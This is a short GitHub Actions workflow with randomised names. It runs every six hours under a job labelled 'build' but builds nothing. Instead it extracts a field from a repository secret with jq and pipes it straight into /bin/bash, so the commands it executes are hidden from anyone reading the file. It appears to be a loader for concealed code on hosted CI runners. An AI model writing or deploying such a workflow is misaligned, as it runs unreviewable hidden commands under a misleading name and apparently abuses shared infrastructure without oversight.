name: caifengjin4516
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caifengjin4516
        env:
          xb43: ${{ secrets.xb43 }}
        run: |
          echo $xb43 | jq -r .ryjau7068 | /bin/bash
          echo $gkdrx8364 | jq -r .ubl977 | /bin/bash

